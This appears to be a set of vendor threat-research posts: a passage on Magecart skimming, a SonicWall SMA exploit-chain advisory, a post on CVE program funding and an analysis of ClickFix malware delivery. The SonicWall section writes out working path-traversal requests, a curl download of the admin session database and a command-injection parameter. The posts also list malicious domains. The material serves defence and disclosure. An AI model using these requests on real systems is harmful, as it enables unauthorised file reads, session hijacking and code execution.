3. Example of malicious image tad used to hide and run loader code (Akamai, 2023)Once triggered, it establishes a WebSocket connection to a C2 server, sending the page URL to verify if it’s a sensitive page (like checkout).If confirmed, full malicious code is delivered, harvesting and exfiltrating payment data.Uses anti-bot detection and WebSocket to evade traditional scanners.2. Fake Meta Pixel with Payload Hidden in ImageAttackers disguise their loader inside a fake Meta Pixel tracking script.Figure 4. Example of malicious loader hidden inside a script disguised as Meta Pixel code, designed to download a PNG file, containing harmful code (Akamai, 2023)It fetches a seemingly harmless PNG image, which secretly contains a Base64-encoded JavaScript payload appended to its binary.The payload is extracted and executed, again opening a WebSocket to perform data theft, similar to Variation 1.3. Skimmer Hidden in 404 Error PagesLoader fetches a non-existent resource (e.g., /icons) to trigger a 404 page.Figure 5. Example of malicious code attempting to fetch /icons from a non-existent path (Akamai, 2023)The default 404 page was secretly modified to include the malicious payload hidden inside an HTML comment.Figure 6. Example of default 404 error page HTML (Akamai, 2023)After extraction, the code either injects a fake payment form or overlays sensitive fields to steal user input.Figure 7. Example of fake form delivered through the malicious code (Akamai, 2023)This method persists even if infected scripts are removed and can bypass Content Security Policies (CSPs) and network-based defenses. Centripetal’s PerspectiveCleanINTERNET® has maintained persistent monitoring of Magecart infrastructure with continuous protections in place across all customer environments. Leveraging 1,226 domain-based Indicators of Compromise (IOCs) extracted from the more active and recent portions of a curated OSINT dataset (2014–2025, GitHub), CleanINTERNET® conducted a targeted retrospective analysis focused on infrastructure activity observed between January and April 2025. This effort aimed to quantify Magecart visibility, behavioral patterns, and attribution fidelity across our telemetry.These externally sourced IOCs were integrated into our internal threat intelligence platform, where they were enriched using passive DNS history, WHOIS registrar telemetry, and behavioral classification engines. This analysis allowed us to identify key elements of our threat intelligence posture, including overall event visibility across our customer base, registrar information, and behavior-based IOC classification.Initial findings indicate that by late April 2025, CleanINTERNET® had achieved significant visibility into Magecart infrastructure. As illustrated in Figure 8, 86.6% of the total attributed IOCs were previously observed in our BDN feeds. The high coverage rate supports the fact that much of the Magecart infrastructure had been in circulation well before analysis, indicating sustained adversary reuse, low domain churn, and a preference for persistent infrastructure. This aligns with known Magecart tactics, where skimmer domains often remain dormant or operate at low volume to evade early detection, only becoming active once embedded within compromised checkout flows or high-traffic e-commerce platforms.Notably, the 13.2% of IOCs not previously observed in our BDN feeds may be attributed to the age of the attributed IOC dataset, which spans from 2014 to 2025. Given that some Magecart domains are known to be re-registered and repurposed for other malicious activities, such as malvertising, after being decommissioned, it's plausible that these domains were inactive or repurposed during our monitoring period, leading to their absence in our feeds. For example, the domain 1clicktracker[.]com was associated with malicious activity in 2022, including phishing campaigns and beaconing to various threat actors. After expiring, the domain was re-registered and repurposed for ad-serving purposes, functioning as a parked domain. This behavior aligns with observed trends where previously malicious domains are repurposed for monetization through advertising schemes (Informa TechTarget, 2019). This highlights the importance of continuous monitoring and the challenges posed by the evolving lifecycle of malicious domains.Figure 8. Overall BDN CoverageAttribution-level telemetry further segmented the dataset by behavior profile. Figure 9 highlights that over 30 distinct IOCs were mapped to command-and-control (C2) infrastructure, likely hosting JavaScript-based skimmers exhibiting event-driven exfiltration tied to obfuscated payloads. Additional IOC clusters were linked to phishing infrastructure, delivery vectors, and resource hijacking nodes, though these accounted for a smaller fraction of observed telemetry. The rest of the dataset remains uncategorized due to lack of engagement data—possibly indicating infrastructure reserved for future activation, limited-scope targeting, or sandbox evasion mechanisms.Figure 9. Percentage of BDN IoCs Associated with a TacticFrom a targeting perspective analyzing observed traffic, Figure 10 shows that Magecart infrastructure disproportionately affected the education sector (55%), followed by technology (20.6%) and healthcare (11.6%). This trend is likely driven by the education sector’s widespread reliance on third-party payment processors, e-commerce platforms, and outdated or unpatched web infrastructure—factors that create fertile ground for supply chain exploitation. Notably, past Magecart attacks such as the compromise of Blue Bear Software—a vendor servicing school accounting portals—exposed sensitive payment data from online campus stores (Threatpost, 2019). These patterns reflect an opportunistic targeting strategy aimed at institutions with broad attack surfaces and limited defensive resources.Figure 10. Percentage of Affected Customer Business SectorsRegistrar telemetry further reveals infrastructure provisioning patterns. As shown in Figure 11, Namecheap was overwhelmingly the registrar of choice (68.7%) for Magecart-linked domains, followed by Dynadot LLC (7.68%) and NameSilo LLC (5.18%). This distribution aligns with historical threat actor behavior favoring low-friction registrars with minimal identity verification and relaxed abuse handling, enabling fast domain acquisition and rapid turnover of malicious infrastructure.Figure 11. Distribution of Domain RegistrarsNotably, event correlation surfaced several high-activity domains, including frontstatics[.]com (29.4%), lererikal[.]org (17.1%), and paysysmetrics[.]com (10.7%) (Figure 12). External open source threat intelligence corroborates these findings: for instance, Sucuri has flagged these domains as part of a known malware campaign involving digital skimming, associating it with malware categorized as “shoplifter.” The domain was further linked to phishing and spam-based distribution, reinforcing its role in Magecart operations. Such third-party validation helps contextualize internal telemetry and strengthens attribution to active skimming infrastructure.Figure 12. Top 20 BDN TriggersMagecart continues to represent a dynamic, technically advanced threat, leveraging real-time user input hijacking, third-party supply chain abuse, and polymorphic payload delivery. Ongoing defense requires continuous enrichment of IOC datasets, passive telemetry triangulation, and proactive detection strategies anchored in behavioral heuristics and infrastructure risk scoring.Magecart remains one of the most persistent and adaptive threats facing the modern digital commerce ecosystem. Its operators continue to evolve their techniques, exploiting both technical and human vulnerabilities, while targeting under-resourced sectors like education and healthcare. The group’s emphasis on stealth, modularity, and infrastructure redundancy allows skimming activity to persist undetected across compromised environments, often for extended periodsCleanINTERNET® maintains strong visibility into active Magecart infrastructure, with over 86% of identified IOCs already present in our threat intelligence. Many of these domains are still active, supporting skimmer delivery, data exfiltration, and loader functions. Our intelligence is continuously enriched through a wide network of security partners, giving us a broader and more current view of malicious infrastructure. This allows us to detect and shield against threats earlier and more comprehensively than reliance on OSINT alone.Magecart domains often persist across campaigns, and our coverage reflects that spotting domains reused with low-volume, stealthy activity. CleanINTERNET® delivers high-fidelity detection through real-time IOC upgrades, ensuring customers are protected from both known and emerging Magecart threats.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. ResourcesSucuri - frontstatics[.]comSansec - What is Magecart?Akamai - Magecart Attack Disguised as Google Tag ManagerAkamai - The Art of Concealment: A New Magecart Campaign That’s Abusing 404 PagesMalwarebytes - The many tentacles of Magecart Group 8Malwarebytes - The forgotten domain: Exploring a link between Magecart Group 5 and the Carbanak APTTheHackerNews - Magecart Targets Emergency Services-related Sites via Insecure S3 BucketsThreatpost - Magecart Hits Parents and Students via Blue Bear AttackInforma TechTarget - Sinkholed Magecart domains resurrected for advertising schemesSplunk - CosmicSting: A Critical XXE Vulnerability in Adobe Commerce and Magento (CVE-2024-34102) --- ### [Chaining CVE-2024-38475 and CVE-2023-44221 for Full System Compromise](https://www.centripetal.ai/threat-research/cve-2024-38475-and-cve-2023-44221) Published: 2025-05-06 Summary: Two critical vulnerabilities—CVE-2024-38475 and CVE-2023-44221—impact Apache HTTP Server and SonicWall SMA 100 series appliances, enabling arbitrary file reads and post-auth command injection. Learn… CVE-2024-38475 is a critical vulnerability in the Apache HTTP Server’s mod_rewrite module that permits arbitrary file read operations under specific configurations. This flaw arises from inadequate sanitization of user-controlled input passed to RewriteRule directives, which allows attackers to traverse the filesystem by manipulating server variables and regex capture groups. When vulnerable rewrite logic is in place, remote attackers can exfiltrate sensitive files, such as database credentials, environment variables, or SSH private keys. The vulnerability, stemming from an Apache HTTP Server flaw prior to version 2.4.59, impacts SonicWall Secure Mobile Access (SMA) 100 series appliances running versions earlier than 10.2.1.13-72sv. With a CVSS score of 9.1 (Critical), this vulnerability poses a severe risk to confidentiality, integrity, and availability. In parallel, CVE-2023-44221 targets a different layer of the system, specifically, SonicWall SMA 100 series appliances and introduces a post-authentication command injection vulnerability within the web-based diagnostic interface. Here, user-supplied input is passed to shell commands invoked by CGI-based functions such as traceroute6 and ping6. Although a sanitization routine is applied to escape a set of special characters, the implementation is flawed: it fails to enforce bounds on the length of escaped output. This oversight allows a stack buffer overflow condition, enabling attackers to overwrite adjacent memory and construct malformed shell commands that bypass intended restrictions. As a result, arbitrary command execution can be achieved under the context of the nobody user. The vulnerability affects SMA 100 versions 10.2.1.9-57sv and earlier and has been assigned a CVSS score of 7.2, reflecting its high severity and exploitation complexity (WatchTowr, 2025). While these vulnerabilities differ in nature, one enabling unauthenticated file disclosure, the other offering post-authentication code execution, they are increasingly being observed as components of chained exploitation campaigns. CVE-2024-38475 provides attackers with the means to enumerate configuration files, harvest credentials, and uncover backend services, laying the groundwork for authenticated access. From there, CVE-2023-44221 can be leveraged to escalate privileges or pivot deeper into the network through direct shell execution. Together, these two vulnerabilities form a potent exploitation chain, offering adversaries a pathway from initial access to full compromise of edge infrastructure. This underscores the need for prompt patching, strict input validation in web server configurations, and robust segmentation and monitoring at the network edge. Vulnerability Type (CWE) CVE-2024-38475 - CWE-35: Path traversal vulnerability, a class of vulnerability that arises when user-controlled input is improperly validated before being used in file system operations. CVE-2023-44221 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), encompasses flaws where an application incorporates user input into system-level commands without adequately sanitizing or escaping special characters like ;, &, |, or backticks. CVE-2024-38475 CVSS Score Base Score: 9.1 (Critical) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Privileges Required: None (PR:N) User Interaction: None (UI:N) Scope: Unchanged (S:U) Impact on CIA: High Confidentiality: High (SC:H) Integrity: High (SI:H) Availability: High (SA:H) CVE-2023-44221 CVSS Score Base Score: 7.2(High) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Privileges Required: High ****(PR:H) User Interaction: None (UI:N) Scope: Unchanged (S:U) Impact on CIA: High Confidentiality: High (SC:H) Integrity: High (SI:H) Availability: High (SA:H) Impacted Versions SMA 100 Series (SMA 200, 210, 400, 410, 500v)Impacted versionsPatched versions(CVE-2024-38475)10.2.1.13-72sv and earlier versions.10.2.1.14-75sv and higher versions.CVE-2023-4422110.2.1.9-57sv and earlier versions.10.2.1.10-62sv and higher versions. Mitigation Steps Firmware Upgrade: Update SonicWall SMA 100 appliances to firmware version 10.2.1.14-75sv or later, which patches both CVE-2023-44221 and CVE-2024-38475. Access Controls: Restrict administrative access via IP allowlists or VPN-only access. Implement role-based access control (RBAC) to ensure that only authorized personnel have access to high-privilege features. Disable public internet exposure of management interfaces whenever possible, and place them behind bastion hosts or within segregated administrative networks. Monitoring and Logging: Deploy real-time monitoring and alerting mechanisms to detect anomalous behaviors such as unusual shell activity, unexpected command execution (e.g., ifconfig, traceroute, or touch in diagnostic logs), or access to sensitive files. Use file integrity monitoring (FIM) and log analysis tools to capture indicators of potential exploitation. Web Server Hardening: Audit mod_rewrite rules in Apache configs. If unused, disable mod_rewrite. Run Apache with least-privilege. Defense in Depth: Deploy a web application firewall (WAF) to block injection and traversal payloads. Use IDS/IPS and network segmentation to limit attack surface. Exploit Process of CVE-2024-38475 and CVE-2023-44221 on SonicWall SMA Appliances (Watchtowr, 2025) Target Appliance and Vulnerable Configuration The SonicWall Secure Mobile Access (SMA) appliance, version 10.2.1.7-49sv, ships with an Apache HTTP server using mod_rewrite rules defined in /usr/src/EasyAccess/www/conf/httpd.conf. These rules include: RewriteRule ^/(.+)\\.+\\.+\\.+\\.+*-+.*\\.css$ /$1.css This specific rewrite rule accepts paths matching a regular expression with an IP-like structure followed by a .css extension, and strips everything after the first segment, resolving it relative to the DocumentRoot: DocumentRoot "/usr/src/EasyAccess/www/htdocs" Exploitation Primitives: Filename Confusion + mod_rewrite Orange Tsai previously identified a behavior in Apache’s mod_rewrite where the substitution path is treated like a URL rather than a filesystem path. Using a URL-encoded question mark (%3f), it's possible to truncate the requested path and bypass expected file resolution logic. Triggering Arbitrary File Read By requesting a URL such as: https://host/tmp/secret.txt%3f.1.1.1.1a-1.css Apache’s mod_rewrite will:Match the .css rewrite rule.Truncate the suffix due to the %3f URL-encoded character.Resolve /tmp/secret.txt directly, bypassing the document root restrictions.The server responds with the contents of the targeted file, assuming it is readable by the nobody user (the user under which the webserver runs). Practical File Read: Apache Logs To verify file read capability, a request is made to retrieve the Apache access log: GET /mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css HTTP/1.1 Returns HTTP/1.1 200 OK with log content, demonstrating successful arbitrary file access. Privilege Escalation via Session Hijacking One particularly valuable file, /tmp/temp.db, is a SQLite database storing active admin session details, including CSRF tokens and session cookies. Attempting to download the file via: curl <https://host/tmp/temp.db%3f.1.1.1.1a-1.css> -o temp.db Sometimes returns an empty DB, likely due to the file being locked or actively written. However, using HTTP Range headers, the attacker can reliably download the file byte-by-byte: GET /tmp/temp.db%3f.1.1.1.1a-1.css HTTP/1.1 Range: bytes=7875-8000 This enables full offline reconstruction of the SQLite database and exfiltration of admin session tokens, effectively granting privileged access without authentication. Post-Auth RCE via CVE-2023-44221 With administrative access achieved, the attacker can now exploit CVE-2023-44221, a post-auth command injection vulnerability in the traceroute6_handler function accessible via: POST /spog/diagnostics Initial attempts to inject commands via: tool=TRACEROUTE6_CMD&target=";touch+/tmp/malicious-payload;" fail due to the use of a sanitization function, shellScriptEncode(), which escapes key shell metacharacters like ", $, ```, and \\. Bypassing shellScriptEncode() via Buffer Overflow The shellScriptEncode() function blindly escapes input and writes to a fixed-size buffer (escaped_cmd) adjacent to another buffer (command). There is no length check, so overlong input causes a stack buffer overflow, corrupting the command construction logic. Example: Input: target="""""... (hundreds of quotes) Output (escaped): \\"\\"\\"\\"\\"... (resulting in >256 bytes) This corrupts the adjacent command buffer, removing the null terminator and allowing sprintf to concatenate data from both buffers, effectively constructing an unintended shell command. The malformed command is then executed via popen(). Achieving Remote Code Execution Through this overflow-induced command manipulation, attackers can inject arbitrary commands. For instance: touch /tmp/malicious-payload is executed on the appliance, proving arbitrary command execution with the privileges of the nobody user. Timeline December 4, 2023 - SonicWall releases patch for CVE-2023-44221 in version 2.1.10-62sv and later. December 4, 2024 - SonicWall issues fix for CVE-2024-38475 in version 2.1.14-75sv and later. April 29, 2025 - SonicWall confirms both vulnerabilities are potentially being exploited in the wild; urges customers to verify for unauthorized access and update devices. IOCs URL Access Patterns Requests with URL-encoded special characters (e.g., %3f) targeting sensitive paths Suspicious .css file suffixes used to obfuscate malicious requests Unusual access attempts to local file paths like /etc/passwd, /tmp/*.db, /mnt/ram/* Suspicious HTTP Headers Valid-looking CSRF tokens in conjunction with malformed or obfuscated parameters Consistent use of session cookies in malicious POST requests File Access Behavior Byte-range read attempts on log or database files Unauthorized or repeated access to system files not normally exposed via HTTP Command Injection Signatures POST requests to diagnostic or tool endpoints with shell metacharacters (;, |, &&) Parameters attempting to execute system commands (e.g., using touch, wget, or curl) Artifact Creation Unexpected files appearing in writable directories like /tmp/, suggesting attacker presence or tooling execution Log Artifacts Repeated HTTP 404/403 errors tied to malformed .css or encoded requests Anomalous patterns in web server logs, especially tied to internal path traversal or probing The combined exploitation of CVE-2024-38475 and CVE-2023-44221 in SonicWall SMA 100 devices presents a potent attack vector with serious implications for enterprise environments. CVE-2024-38475, a critical path traversal flaw in Apache HTTP Server, can be exploited remotely without authentication to gain unauthorized access to sensitive files and configurations. In practice, attackers often leverage this exposure to escalate privileges or retrieve credentials, enabling them to pivot toward more intrusive attacks. Once privileged access is obtained, CVE-2023-44221 becomes particularly dangerous. This post-authentication OS command injection vulnerability allows an attacker with administrative rights to execute arbitrary system commands as the nobody user. When chained, the two flaws can lead to full system compromise, enabling persistent access, lateral movement, and the deployment of additional payloads (SonicWall, 2025). Given the severity of this exploit chain, immediate remediation is critical. Organizations should apply the latest firmware updates, restrict administrative access, and implement strict input validation across all management interfaces. Enhanced monitoring and anomaly detection should be prioritized to identify potential abuse of these vulnerabilities in the wild. Centripetal’s Perspective Centripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities like CVE-2024-38475 and CVE-2023-44221, which allow remote attackers to traverse file paths and execute arbitrary commands on SonicWall SMA 100 appliances. By exploiting these flaws in tandem, adversaries can escalate privileges and gain persistent control over targeted environments. Leveraging billions of threat indicators, CleanINTERNET dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats. If you are a current client of SonicWall SMA 100 please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources Sonicwall Vulnerability List - SonicWall SMA100 SSL-VPN Affected By Multiple Vulnerabilities Sonicwall Vulnerability List - SonicWall SSL-VPN SMA100 Version 10.x Is Affected By Multiple Vulnerabilities Watchtowr - SonicBoom, From Stolen Tokens to Remote Shells - SonicWall SMA (CVE-2023-44221, CVE-2024-38475) TheHackerNews - SonicWall Confirms Active Exploitation of Flaws Affecting Multiple Appliance Models CVE-2023-44221 CVE-2024-38475 --- ### [CVE Program Funding Concerns and Emerging Alternatives](https://www.centripetal.ai/threat-research/cve-program-funding-concerns-and-emerging-alternatives) Published: 2025-04-28 Summary: DHS funding for MITRE’s CVE Program nearly expired in April 2025, exposing the risks of relying on a single source for global vulnerability tracking. On April 16, 2025, a critical moment unfolded in the cybersecurity world when the U.S. Department of Homeland Security’s funding for the Common Vulnerabilities and Exposures (CVE) Program, operated by MITRE, was set to expire. The CVE system is a globally relied-upon database for cataloging known cyber vulnerabilities and has been a cornerstone of vulnerability management for over 25 years since its public launch in 1999. Initially, the Cybersecurity and Infrastructure Security Agency (CISA) confirmed that the contract with MITRE would not be renewed, raising significant concerns across the global cybersecurity community. Without this centralized source of vulnerability data, many feared serious impacts on vulnerability tracking, patch management, threat intelligence and incident response. In a last-minute turnaround, CISA extended MITRE’s contract for 11 more months until March 2026, preventing an immediate disruption. However, the uncertainty of long-term support has exposed the fragility of relying on a single, government-funded resource. Why This Matters The CVE database: Enables standardized vulnerability scanning and patch prioritization. Powers integrations across many security tools Standardizes how vulnerabilities are communicated globally. Therefore, a disruption, even temporary, could have created confusion and gaps in security defense across critical infrastructure, enterprises and cybersecurity operations. Emerging Alternatives and New Initiatives CVE Foundation A group of long-time CVE Board members has launched the CVE Foundation to ensure “the long-term independence, neutrality, and sustainability” of the CVE Program. Their goal is to transition the database away from dependence on U.S. government funding. European Vulnerability Database (EUVDB) The EU Vulnerability Database, created by the European Union Agency for Cybersecurity (ENISA), has been launched to provide an independent, transparent, and multilingual source of vulnerability data. It was developed under the NIS2 Directive and functions similarly to the U.S. NVD. GCVE: A Decentralized CVE Model GCVE (Global CVE Allocation System), introduced by CIRCL Luxembourg, proposes a decentralized approach to CVE issuance. It enhances the traditional CVE model by including the issuing authority (CNA) in the identifier format, helping reduce reliance on centralized coordination. What You Should Do Now Diversify your threat intelligence sources: Supplement CVE data with: CISA’s Known Exploited Vulnerabilities (KEV) NVD (National Vulnerability Database) GitHub Security Advisories Track Alternative Initiatives Stay informed by monitoring: CVE Foundation updates EUVDB activity GCVE development and adoption Brief Executive Leadership Use this moment to elevate awareness at the leadership level: Emphasize the importance of diversified cyber infrastructure. Advocate for investments in vendor-neutral threat intelligence. Build business continuity into your vulnerability management processes. Centripetal's Perspective Centripetal recognizes the critical role the CVE Program plays in the broader cybersecurity ecosystem—particularly in the standardization of vulnerability identification, coordinated disclosure processes, and support for vulnerability management initiatives. While the recent 11-month extension of CVE services is reassuring, we want to clarify that Centripetal’s core services are not dependent on the CVE Program. Our CleanINTERNET® service is focused on proactive threat prevention, real-time threat intelligence correlation, and network protection against known and emerging threats. However, we understand that many of our customers leverage CVE data within their own internal vulnerability management workflows, and we recognize the potential impact this uncertainty may cause. Where CVE identifiers are embedded in threat intelligence or used as enrichment in threat feeds, Centripetal continues to ingest and support that data to enhance threat detection. We are actively monitoring the progress of the CVE Foundation, the EU Vulnerability Database (EUVDB), and other emerging initiatives like GCVE to ensure continuity and adaptability across our services. Should alternative or supplemental vulnerability sources become necessary, our service is fully capable of integrating them into our intelligence processing pipeline. Our intelligence partners also continue to enhance their vulnerability intelligence which leverages, but does not depend on CVEs. In a similar fashion, Centripetal will continue build resilience into CleanINTERNET and to use this vulnerability intelligence to identify exposures, attribute TTPs, and to defend our customers while reducing our dependence on any sole data source. Resources https://www.siliconrepublic.com/enterprise/mitre-cybersecurity-database-us-government-funding https://industrialcyber.co/threat-landscape/mitre-warns-of-potential-cybersecurity-disruptions-as-us-government-funding-for-cve-cwe-programs-set-to-expire/ --- ### [ClickFix and the New Era of Social Engineering](https://www.centripetal.ai/threat-research/clickfix-and-the-new-era-of-social-engineering) Published: 2025-04-23 Summary: Explore how ClickFix is redefining social engineering attacks—leveraging deceptive interfaces, clipboard manipulation, and user trust to deliver modern malware. ClickFix is an emerging social engineering technique that has gained traction among both cybercriminals and APT groups due to its effectiveness and low barrier to execution. First observed around October 19, 2023, disguised as Cloudflare anti-bot protection, ClickFix deceives users into taking action to "fix" a non-existent issue, often through fake reCAPTCHA pages, spoofed software updates, or fraudulent security prompts. It is considered a variant of the broader ClearFake campaign, which similarly uses fake browser alerts and security warnings to trick users into executing malicious scripts. ClickFix builds on these tactics with increased use of clipboard manipulation and PowerShell payloads, making it more evasive and accessible to a wider range of threat actors. By exploiting human behavior and trust in familiar web elements, this opportunistic method enables attackers to deliver sophisticated malware variants, including Qakbot and Lumma Stealer. Qakbot, previously dismantled in Operation “Duck Hunt” has resurfaced using ClickFix as an initial access vector, while Lumma Stealer (LummaC2 Stealer) targets crypto wallets and 2FA browser extensions through similar deceptive means. Despite its growing popularity, ClickFix activity remains difficult to quantify due to its opportunistic nature and reliance on drive-by infections, where victims are often unaware they have been compromised. These characteristics make it a stealthy and persistent threat across sectors. (HHS.gov, 2024) ClickFix Distribution Vectors Newer ClickFix campaigns often rely on malvertising to drive traffic to malicious domains. Threat actors take advantage of websites that offer free or pirated content, such as games, movies, and cracked software, which commonly rely on ad revenue and typically lack strict content filtering. These sites frequently serve as distribution points for unwanted redirections triggered by malicious advertising. While these examples are common, they are not exhaustive; a wide range of poorly moderated or ad-heavy websites can also be exploited. As a result, users seeking freeware, pirated tools, or other unvetted content are particularly vulnerable to ClickFix lures. To generate traffic and leads to their malicious infrastructure, threat actors employ a variety of tactics, including: Spear Phishing Malvertising Search Engine Optimization (SEO) poisoning Compromised websites Spam on social media and other forums Delivery & Attack Chain (LummaC2 Info-Stealer Example) One of the most detailed attack chain case studies available online, published by Group-IB, outlines each step from a user's initial interaction with a malicious domain to the delivery of the final payload. The attack unfolds as follows: Attackers infect a website that redirects the victim to a fake reCAPTCHA page. Once the user clicks on the “I am not a robot” prompt, a malicious PowerShell command is automatically copied to their clipboard. The user is then instructed to open the Windows Run dialog (by pressing Windows + R) and press Ctrl + V to paste the command, unknowingly initiating the malware execution process. (Figure 1) Figure 1. Fake reCAPTCHA page used to trick users into running a malicious command. (Sourced from GitHub) The malicious command observed in most analyses is a Base64-encoded PowerShell command that downloads a portable executable containing an HTA (HTML Application), which then executes an obfuscated JavaScript loader. Below is a sample of the encoded and decoded versions discovered by Group-IB. (Figure 2) Figure 2. Encoded and Decoded Base64 PowerShell Command In this example, threat actors exploit Microsoft’s HTML Application (HTA) via mshta in PowerShell. **RedCanary provides valuable insight into how attackers abuse this trusted, signed utility to execute arbitrary code embedded in HTML. This technique allows the execution of <script> tags alongside binary code without detection. For simplicity, the following figures compile both stages of the JavaScript loader, as detailed in the Group-IB analysis. Figure 3. Stage One of The JavaScript Loader Figure 4. Stage Two of The JavaScript Loader The script starts by assigning decimal-encoded ASCII values to variables with randomized names. In stage 1 the String.fromCharCode() function is used to convert those numbers back into readable characters, reconstructing part of the script. (Figure 3) In stage 2 variables like hch and JKK hold obfuscated data. (Figure 4) A function named hsHis used to decode this data (hch and JKK) and reveal what the variables actually contain. (Figure 4) Figure 5. Final Stage Resolving into SMOKESABER The decoded variable JKk turns out to be "Wscript.Shell", a Windows component that allows scripts to run system-level commands. (Figure 5) The script creates a new ActiveX Object using this string, which gives it permission to interact with the system. (Figure 5) Finally, the script uses the decoded contents of hch, which resolve to SMOKESABER, a PowerShell downloader that executes the final malicious payload. Smokesaber & Final Payload SMOKESABER runs stealthily, using a hidden window and bypassing execution policies. It hides its download URL using encoded numbers, decoded by a function that reveals the real link. (Figure 6) The script checks for bravo.zip in the TEMP folder; if missing, it downloads and extracts it. The extracted file is then executed to deliver the final info-stealer payload. Figure 6. SMOKESABER The final payload extracted from bravo.zip contains the LummaC2 infostealer. The unzipped contents (Figure 7) include one executable (0tagscan.exe) and several supporting DLLs required for the malware to operate. The malware injects into BitLockerToGo.exe, then completes the attack by connecting to its command-and-control (C2) infrastructure. Figure 7. Bravo.zip File Contents ( All Images in this section sourced from GROUP-IB) ClickFix Operational Lures and Threat Actor Usage The following outlines how various threat actors have employed ClickFix-style lures typically involving brand impersonation, SEO manipulation, or malicious redirects to deceive victims and deliver malware. These observations, identified by Sekoia, show that while the tactics vary, they all center around leveraging recognizable services or themes to increase credibility and click-through rates. Lazarus Group has primarily targeted the cryptocurrency and finance sector by impersonating platforms such as Coinbase, KuCoin, Circle, and Robinhood. Their infrastructure includes spoofed Google Meet domains (e.g., meet.google[.]us-join[.]com, googledrivers[.]com) used to lure victims into malicious redirects. TA571, known for email-based delivery, has used HTML attachments as a primary lure to initiate infection, relying on phishing emails to distribute payloads. Storm-1865 has targeted the hospitality and travel sectors using impersonated domains resembling legitimate booking services like Booking[.]com. Their infrastructure includes spoofed Zoom-related domains such as us01web-zoom[.]us and webroom-zoom[.]us. APT28 (Fancy Bear) has leveraged a combination of advertisement abuse, phishing emails, and SEO poisoning, a technique that manipulates search engine results to lure users to malicious sites. They are known for extensive redirection-based attacks. MuddyWater has similarly used advertisement-based lures, phishing emails, and SEO poisoning as part of their broader malware delivery strategy. These examples demonstrate the flexibility of ClickFix-style tactics across multiple sectors and threat actors, with common themes of impersonation, redirection, and exploitation of user trust in familiar brands. Centripetal’s Perspective CleanINTERNET® has observed this campaign targeting multiple customers since early 2024. Attribution-based analysis across findings tagged as “ClickFix” and “ClearFake” confirms early activity by known threat actors. Initially, the campaign relied heavily on fake browser update prompts to distribute malware through social engineering. Over time, this evolved into what is now identified as the ClickFix variant, which leverages deceptive CAPTCHA pages and clipboard manipulation. This shift in tactics aligns with recent threat intelligence reports and reflects an evolution in the campaign’s delivery mechanisms and attribution. The Health Sector Cybersecurity Coordination Center published a comprehensive report on October 29th, 2024, detailing ClickFix attacks, associated threat actors, the campaign timeline, and a full list of known Indicators of Compromise (IOCs). This report served as the foundation for our internal analysis. By ingesting the provided IOCs into our threat intelligence database, we aimed to assess our historical visibility and coverage of these indicators from the time of publication to the present. This analysis allowed us to identify key elements of our threat intelligence posture, including domain age, registrar information, first-seen dates in our provider’s intelligence feeds, and overall event visibility across our customer base. During our analysis of 155 domains attributed to various threat actors and operational clusters, we found that by May 1st, 2024, the initial date of our investigation, CleanINTERNET® already had substantial visibility into the ClickFix campaign. This aligns with the timeline published by the U.S. Health Sector Cybersecurity Coordination Center (HC3), which identified May 2024 as the point when the campaign first emerged. The early detection suggests that a significant portion of the malicious infrastructure had already been flagged across multiple provider feeds. However, the accompanying graph also reveals a steady stream of new IOCs detected in the months that followed, indicating that some domains appeared later, likely due to delayed use, limited visibility at the time, or periods of inactivity before being weaponized. (Figure 8) Figure 8. Number of BDN IOCs from Providers by Date When analyzing the distribution of domains by registrar, we found that the vast majority of phishing domains used to carry out attacks leveraging the ClickFix tactic were registered through providers such as Public Domain Registry (PDR), NameSilo, and Dynadot, among others. To validate our findings, we compared them with a separate analysis published by CircleID in an article on DNS abuse and redirection involving another JavaScript-based malware. Our goal was to determine whether threat actors consistently favor certain registrars across campaigns. We placed both graphs side by side for comparison. In CircleID’s chart (Figure 9), NameSilo and GoDaddy are among the top registrars identified. In Centripetal’s analysis, Public Domain Registry and NameSilo are the most commonly used. (Figure 10) NameSilo consistently appears as a preferred registrar in both our internal analysis and external reporting, such as the study published by CircleID, highlighting its frequent use across multiple malicious campaigns. Threat actors are often drawn to registrars like NameSilo for a few key reasons, mostly tied to cost, policy leniency, and operational convenience. While NameSilo is a legitimate domain registrar, it has appeared frequently in threat reports as a popular choice for malicious domain registration—especially in phishing, malware distribution, and social engineering campaigns like ClickFix and ClearFake. Figure 9. Circle ID distribution of Domains by Registrar Analysis (Sourced from CircleID) Figure 10. Distribution of Domains by Registrars In the last part of our analysis, Figure 11 shows that 87.6% of malicious domains were detected within 0–6 days of creation, highlighting strong early visibility into attacker infrastructure. A small portion 4.95% was detected after 90 days, suggesting dormant or delayed-use domains. The remaining 7.45% appeared between 7 and 89 days. There are several reasons why some domains may go undetected for extended periods: they may not have been immediately weaponized, could have been used in low-volume or highly targeted attacks, or may have initially resolved through benign infrastructure to avoid early detection. Figure 11. Distribution of Domains by Number of Days Unknown ( From creation to CTI) ClickFix has emerged as a simple yet highly effective social engineering tactic that leverages user trust in familiar interfaces to deliver malware. Its low technical barrier and high success rate have made it attractive to a wide range of threat actors including APTs like Lazarus Group and access brokers like TA571. By mimicking legitimate services and prompting users to run malicious commands themselves, ClickFix bypasses many traditional defenses. As the technique spreads across phishing, malvertising, and SEO poisoning, defending against it requires a shift toward behavior based detection, user education, and proactive threat hunting. ClickFix is not just a passing trend. It is a growing tactic that exploits human error as much as system vulnerability. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources 